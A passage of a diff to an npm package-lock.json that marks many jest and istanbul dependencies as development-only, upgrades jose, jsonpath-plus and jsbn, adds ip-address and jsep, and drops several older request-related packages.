"sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", + "dev": true }, "import-local": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", + "dev": true, "requires": { "pkg-dir": "^4.2.0", "resolve-cwd": "^3.0.0" @@ -5589,12 +5952,14 @@ "imurmurhash": { "version": "0.1.4", "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==" + "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "dev": true, "requires": { "once": "^1.3.0", "wrappy": "1" @@ -5603,17 +5968,38 @@ "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "dev": true, + "requires": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "dependencies": { + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "dev": true + } + } }, "is-arrayish": { "version": "0.2.1", "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==" + "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", + "dev": true }, "is-core-module": { "version": "2.15.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", + "dev": true, "requires": { "hasown": "^2.0.2" } @@ -5621,33 +6007,32 @@ "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "dev": true }, "is-generator-fn": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==" + "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", + "dev": true }, "is-number": { "version": "7.0.0", "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==" + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true }, "is-stream": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==" - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", "dev": true }, "isexe": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dev": true }, "isomorphic-ws": { "version": "5.0.0", @@ -5656,21 +6041,17 @@ "dev": true, "requires": {} }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==", - "dev": true - }, "istanbul-lib-coverage": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==" + "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "dev": true }, "istanbul-lib-instrument": { "version": "5.2.1", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", + "dev": true, "requires": { "@babel/core": "^7.12.3", "@babel/parser": "^7.14.7", @@ -5683,6 +6064,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", + "dev": true, "requires": { "istanbul-lib-coverage": "^3.0.0", "make-dir": "^4.0.0", @@ -5693,6 +6075,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", + "dev": true, "requires": { "debug": "^4.1.1", "istanbul-lib-coverage": "^3.0.0", @@ -5703,6 +6086,7 @@ "version": "3.1.7", "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", + "dev": true, "requires": { "html-escaper": "^2.0.0", "istanbul-lib-report": "^3.0.0" @@ -5712,6 +6096,7 @@ "version": "10.9.2", "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", + "dev": true, "requires": { "async": "^3.2.3", "chalk": "^4.0.2", @@ -5723,6 +6108,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", + "dev": true, "requires": { "@jest/core": "^29.7.0", "@jest/types": "^29.6.3", @@ -5734,6 +6120,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", + "dev": true, "requires": { "execa": "^5.0.0", "jest-util": "^29.7.0", @@ -5744,6 +6131,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -5771,6 +6159,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", + "dev": true, "requires": { "@jest/core": "^29.7.0", "@jest/test-result": "^29.7.0", @@ -5789,6 +6178,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", + "dev": true, "requires": { "@babel/core": "^7.11.6", "@jest/test-sequencer": "^29.7.0", @@ -5818,6 +6208,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", + "dev": true, "requires": { "chalk": "^4.0.0", "diff-sequences": "^29.6.3", @@ -5829,6 +6220,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", + "dev": true, "requires": { "detect-newline": "^3.0.0" } @@ -5837,6 +6229,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -5849,6 +6242,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -5861,12 +6255,14 @@ "jest-get-type": { "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==" + "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", + "dev": true }, "jest-haste-map": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/graceful-fs": "^4.1.3", @@ -5886,6 +6282,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", + "dev": true, "requires": { "jest-get-type": "^29.6.3", "pretty-format": "^29.7.0" @@ -5895,6 +6292,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", + "dev": true, "requires": { "chalk": "^4.0.0", "jest-diff": "^29.7.0", @@ -5906,6 +6304,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", + "dev": true, "requires": { "@babel/code-frame": "^7.12.13", "@jest/types": "^29.6.3", @@ -5922,6 +6321,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -5932,17 +6332,20 @@ "version": "1.2.3", "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", + "dev": true, "requires": {} }, "jest-regex-util": { "version": "29.6.3", "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==" + "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", + "dev": true }, "jest-resolve": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", + "dev": true, "requires": { "chalk": "^4.0.0", "graceful-fs": "^4.2.9", @@ -5959,6 +6362,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", + "dev": true, "requires": { "jest-regex-util": "^29.6.3", "jest-snapshot": "^29.7.0" @@ -5968,6 +6372,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", + "dev": true, "requires": { "@jest/console": "^29.7.0", "@jest/environment": "^29.7.0", @@ -5996,6 +6401,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/fake-timers": "^29.7.0", @@ -6025,6 +6431,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", + "dev": true, "requires": { "@babel/core": "^7.11.6", "@babel/generator": "^7.7.2", @@ -6051,7 +6458,8 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, @@ -6059,6 +6467,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -6072,6 +6481,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "camelcase": "^6.2.0", @@ -6084,7 +6494,8 @@ "camelcase": { "version": "6.3.0", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==" + "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + "dev": true } } }, @@ -6092,6 +6503,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", + "dev": true, "requires": { "@jest/test-result": "^29.7.0", "@jest/types": "^29.6.3", @@ -6107,6 +6519,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", + "dev": true, "requires": { "@types/node": "*", "jest-util": "^29.7.0", @@ -6118,6 +6531,7 @@ "version": "8.1.1", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dev": true, "requires": { "has-flag": "^4.0.0" } @@ -6125,16 +6539,16 @@ } }, "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "dev": true, - "optional": true + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", + "dev": true }, "js-tokens": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true }, "js-yaml": { "version": "4.1.0", @@ -6146,81 +6560,69 @@ } }, "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==", + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true + }, + "jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", "dev": true }, "jsesc": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==" + "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", + "dev": true }, "json-parse-even-better-errors": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", "dev": true }, "json5": { "version": "2.2.3", "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==" - }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", + "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", "dev": true }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" } }, "kleur": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==" + "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", + "dev": true }, "leven": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==" + "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "dev": true }, "lines-and-columns": { "version": "1.2.4", "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==" + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dev": true }, "locate-path": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": 